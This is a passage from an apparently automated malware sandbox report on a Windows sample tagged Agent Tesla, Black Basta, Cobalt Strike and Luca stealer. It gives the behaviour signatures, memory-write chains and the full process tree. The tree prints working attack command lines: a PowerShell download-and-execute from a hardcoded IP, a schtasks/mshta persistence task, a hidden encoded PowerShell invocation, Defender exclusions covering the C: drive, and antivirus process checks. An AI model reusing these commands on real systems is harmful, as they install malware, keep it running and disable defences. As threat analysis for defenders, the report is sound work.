  PING.EXE pids: 13020, 13156, 11772, 6184, 11220, 11088, 10508, 9880, 11344, 10396, 13076, 13016, 12268, 10708, 10192, 4576, 12492, 13212, 13124, 13036, 11412, 9992, 9744, 10748, 11648, 6980, 13108, 12640, 10972, 12944, 6752, 12856, 11752, 11904, 12988, 3600, 13240, 12416, 10836, 11520, 12044, 6408, 13220, 12740, 10300, 9644, 12324, 13304, 11196, 10940, 9768, 10640, 6372, 12760, 5136, 11948, 10384, 9424, 9668, 12164, 6528, 6264, 13112, 12852
  Both ping lists stop at 64 entries, the report's per-signature cap, so the true count is higher. Dozens of ping.exe launches inside a 150-second run, alongside the taskkill, tasklist, findstr and reg.exe activity, usually come from batch scripts using ping as a sleep/retry loop; the report does not show the command lines, so confirm from the process tree.
Scheduled Task/Job: Scheduled Task  1 TTPs 1 IoC
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  3064 schtasks.exe  (launched via cmd.exe 6088 directly from the sample; see the WriteProcessMemory chain below)
Suspicious behavior: AddClipboardFormatListener  1 IoC
  2268 powershell.exe  (the process hosting the in-memory Quasar payload)
Suspicious behavior: EnumeratesProcesses  64 IoCs
  1544 powershell.exe (2), 2736 TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE (2), 3592 rapes.exe (2), 2268 powershell.exe (3), 4024 powershell.exe (3), 2832 Rm3cVPI.exe (4), 6128 MSBuild.exe (4), 4588 fontdrvhost.exe (4), 3956 rapes.exe (2), 4580 powershell.exe (3), 2380 Passwords.com (6), 4472 17309ae496.exe (2), 6720 powershell.exe (3), 7048 MSBuild.exe (4), 5352 eea22fbd05.exe (6), 7508 bd762c8745.exe (4), 7816 ae27dc3fa3.exe (6), 2672 4258008d71.exe (2), 12780 rapes.exe (2)
Suspicious behavior: LoadsDriver  2 IoCs
  3648 tzutil.exe, 3188 81a4e8fe.exe
Suspicious behavior: MapViewOfSection  3 IoCs
  5724 u75a1_003.exe (3 times)
Suspicious use of AdjustPrivilegeToken  23 IoCs
  SeDebugPrivilege: 1544, 2268, 4024, 4580, 6720 powershell.exe; 4256, 5212 tasklist.exe; 12400, 6312, 12244, 12128, 12028 taskkill.exe; 11864 firefox.exe (2 times); 3188 81a4e8fe.exe; 10540 27b80601f6.exe
  SeLoadDriverPrivilege: 3648 tzutil.exe; 3188 81a4e8fe.exe
  SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeSecurityPrivilege: 3188 81a4e8fe.exe
  81a4e8fe.exe enables the full set a driver installer needs (load driver, backup/restore, shutdown, firmware environment), consistent with the driver and SafeBoot entries it creates above.
Suspicious use of FindShellTrayWindow  35 IoCs
  5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe (3), 2380 Passwords.com (3), 12444 44f5ba506b.exe (11), 11864 firefox.exe (18)
Suspicious use of SendNotifyMessage  29 IoCs
  5512 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe (3), 2380 Passwords.com (3), 12444 44f5ba506b.exe (11), 11864 firefox.exe (12)
Suspicious use of SetWindowsHookEx  1 IoC
  11864 firefox.exe
  firefox.exe (11864) is not among the dropped executables. The chain carries two browser-credential stealers (Lumma, Stealc), so a browser starting during the run is worth a look, but the report does not show which process launched it.
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target
PID 5512 wrote to memory of 6088 | 5512 | 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 88
PID 5512 wrote to memory of 6088 | 5512 | 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 88
PID 5512 wrote to memory of 6088 | 5512 | 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 88
PID 5512 wrote to memory of 5784 | 5512 | 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 89
PID 5512 wrote to memory of 5784 | 5512 | 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 89
PID 5512 wrote to memory of 5784 | 5512 | 2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe | 89
PID 6088 wrote to memory of 3064 | 6088 | cmd.exe | 91
PID 6088 wrote to memory of 3064 | 6088 | cmd.exe | 91
PID 6088 wrote to memory of 3064 | 6088 | cmd.exe | 91
PID 5784 wrote to memory of 1544 | 5784 | mshta.exe | 93
PID 5784 wrote to memory of 1544 | 5784 | mshta.exe | 93
PID 5784 wrote to memory of 1544 | 5784 | mshta.exe | 93
PID 1544 wrote to memory of 2736 | 1544 | powershell.exe | 100
PID 1544 wrote to memory of 2736 | 1544 | powershell.exe | 100
PID 1544 wrote to memory of 2736 | 1544 | powershell.exe | 100
PID 2736 wrote to memory of 3592 | 2736 | TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE | 101
PID 2736 wrote to memory of 3592 | 2736 | TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE | 101
PID 2736 wrote to memory of 3592 | 2736 | TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE | 101
PID 3592 wrote to memory of 2512 | 3592 | rapes.exe | 105
PID 3592 wrote to memory of 2512 | 3592 | rapes.exe | 105
PID 2512 wrote to memory of 5092 | 2512 | kO2IdCz.exe | 106
PID 2512 wrote to memory of 5092 | 2512 | kO2IdCz.exe | 106
PID 1932 wrote to memory of 5732 | 1932 | cmd.exe | 110
PID 1932 wrote to memory of 5732 | 1932 | cmd.exe | 110
PID 5092 wrote to memory of 5748 | 5092 | cmd.exe | 111
PID 5092 wrote to memory of 5748 | 5092 | cmd.exe | 111
PID 3592 wrote to memory of 3204 | 3592 | rapes.exe | 112
PID 3592 wrote to memory of 3204 | 3592 | rapes.exe | 112
PID 3592 wrote to memory of 3204 | 3592 | rapes.exe | 112
PID 3204 wrote to memory of 4388 | 3204 | cmd.exe | 114
PID 3204 wrote to memory of 4388 | 3204 | cmd.exe | 114
PID 3204 wrote to memory of 4388 | 3204 | cmd.exe | 114
PID 4388 wrote to memory of 2268 | 4388 | cmd.exe | 116
PID 4388 wrote to memory of 2268 | 4388 | cmd.exe | 116
PID 4388 wrote to memory of 2268 | 4388 | cmd.exe | 116
PID 2268 wrote to memory of 4024 | 2268 | powershell.exe | 117
PID 2268 wrote to memory of 4024 | 2268 | powershell.exe | 117
PID 2268 wrote to memory of 4024 | 2268 | powershell.exe | 117
PID 3592 wrote to memory of 2832 | 3592 | rapes.exe | 119
PID 3592 wrote to memory of 2832 | 3592 | rapes.exe | 119
PID 3592 wrote to memory of 2832 | 3592 | rapes.exe | 119
PID 3592 wrote to memory of 5388 | 3592 | rapes.exe | 120
PID 3592 wrote to memory of 5388 | 3592 | rapes.exe | 120
PID 5388 wrote to memory of 6128 | 5388 | TbV75ZR.exe | 121
PID 5388 wrote to memory of 6128 | 5388 | TbV75ZR.exe | 121
PID 5388 wrote to memory of 6128 | 5388 | TbV75ZR.exe | 121
PID 5388 wrote to memory of 6128 | 5388 | TbV75ZR.exe | 121
PID 5388 wrote to memory of 6128 | 5388 | TbV75ZR.exe | 121
PID 5388 wrote to memory of 6128 | 5388 | TbV75ZR.exe | 121
PID 5388 wrote to memory of 6128 | 5388 | TbV75ZR.exe | 121
PID 5388 wrote to memory of 6128 | 5388 | TbV75ZR.exe | 121
PID 5388 wrote to memory of 6128 | 5388 | TbV75ZR.exe | 121
PID 5388 wrote to memory of 6128 | 5388 | TbV75ZR.exe | 121
PID 6128 wrote to memory of 4588 | 6128 | MSBuild.exe | 122
PID 6128 wrote to memory of 4588 | 6128 | MSBuild.exe | 122
PID 6128 wrote to memory of 4588 | 6128 | MSBuild.exe | 122
PID 6128 wrote to memory of 4588 | 6128 | MSBuild.exe | 122
PID 6128 wrote to memory of 4588 | 6128 | MSBuild.exe | 122
PID 3592 wrote to memory of 4844 | 3592 | rapes.exe | 128
PID 3592 wrote to memory of 4844 | 3592 | rapes.exe | 128
PID 3592 wrote to memory of 4844 | 3592 | rapes.exe | 128
PID 4844 wrote to memory of 6112 | 4844 | 7IIl2eE.exe | 129
PID 4844 wrote to memory of 6112 | 4844 | 7IIl2eE.exe | 129
PID 4844 wrote to memory of 6112 | 4844 | 7IIl2eE.exe | 129
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:972
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4588
-
-
C:\Users\Admin\AppData\Local\Temp\2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_84c300a105cb5e140c8c91e2c6ead590_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5512 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn YJ24qma8vr5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hv5aLoGKt.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6088 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn YJ24qma8vr5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\Hv5aLoGKt.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3064
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\Hv5aLoGKt.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5784 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Users\Admin\AppData\Local\TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE"C:\Users\Admin\AppData\Local\TempGKQRD5A1GK13VGCU3VISU5G00N3C3QLV.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3592 -
C:\Users\Admin\AppData\Local\Temp\10381750101\kO2IdCz.exe"C:\Users\Admin\AppData\Local\Temp\10381750101\kO2IdCz.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2512 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c 67e8f4de3ad1d.vbs7⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5092 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\67e8f4de3ad1d.vbs"8⤵PID:5748
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10381761121\5YB5L4K.cmd"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3204 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10381761121\5YB5L4K.cmd"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('[base64-encoded PowerShell payload omitted]')) | Invoke-Expression"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4024
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381770101\Rm3cVPI.exe"C:\Users\Admin\AppData\Local\Temp\10381770101\Rm3cVPI.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\10381780101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10381780101\TbV75ZR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:5388 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:6128 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 5048⤵
- Program crash
PID:4836
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381790101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10381790101\7IIl2eE.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵
- System Location Discovery: System Language Discovery
PID:6112 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4256
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:2400
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5212
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:5692
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183778⤵
- System Location Discovery: System Language Discovery
PID:5912
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab8⤵
- System Location Discovery: System Language Discovery
PID:1456
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation8⤵
- System Location Discovery: System Language Discovery
PID:5992
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com8⤵
- System Location Discovery: System Language Discovery
PID:6140
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N8⤵
- System Location Discovery: System Language Discovery
PID:3376
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2380
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381800101\u75a1_003.exe"C:\Users\Admin\AppData\Local\Temp\10381800101\u75a1_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:5724 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:4472
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4580
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:4440 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6720
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:3836 -
C:\Users\Admin\AppData\Local\Temp\{a943f5ca-cfab-4e1d-a62c-6119d5fa4da9}\661d2f9c.exe"C:\Users\Admin\AppData\Local\Temp\{a943f5ca-cfab-4e1d-a62c-6119d5fa4da9}\661d2f9c.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:4952 -
C:\Users\Admin\AppData\Local\Temp\{5809e50d-7a7e-4f01-9afd-26a5892556c9}\81a4e8fe.exeC:/Users/Admin/AppData/Local/Temp/{5809e50d-7a7e-4f01-9afd-26a5892556c9}/\81a4e8fe.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Checks computer location settings
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:3188 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{d082aa7e-6cdb-4325-8b76-01a5f4c44c90}\ab46dfaa-8c5a-473f-9c3e-8c0f4debbbca.cmd" "11⤵PID:9480
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:9668
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9744
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:9880
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:9992
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10080
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10192
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10300
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10396
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:10492
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:10604
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:10708
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10836
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:10940
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11052
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11136
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:11220
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6184
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11308
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11412
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11520
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11648
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11752
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:11860
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:11948
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12044
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12164
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:12268
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12308
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12416
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6372
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:12492
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12552
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6528
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:12656
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12740
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:12852
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵PID:6628
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13016
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:13112
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13220
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6408
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:6476
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:3600
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5136
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:13288
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- Runs ping.exe
PID:13240
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13156
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13108
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:13020
-
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 112⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:12932
-
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v ab46dfaa-8c5a-473f-9c3e-8c0f4debbbca /f12⤵
- Modifies registry key
PID:12832
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381810101\17309ae496.exe"C:\Users\Admin\AppData\Local\Temp\10381810101\17309ae496.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4472
-
-
C:\Users\Admin\AppData\Local\Temp\10381820101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10381820101\EPTwCQd.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7028 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7048
-
-
-
C:\Users\Admin\AppData\Local\Temp\10381830101\eea22fbd05.exe"C:\Users\Admin\AppData\Local\Temp\10381830101\eea22fbd05.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5352
-
-
C:\Users\Admin\AppData\Local\Temp\10381840101\bd762c8745.exe"C:\Users\Admin\AppData\Local\Temp\10381840101\bd762c8745.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7508
-
-
C:\Users\Admin\AppData\Local\Temp\10381850101\ae27dc3fa3.exe"C:\Users\Admin\AppData\Local\Temp\10381850101\ae27dc3fa3.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
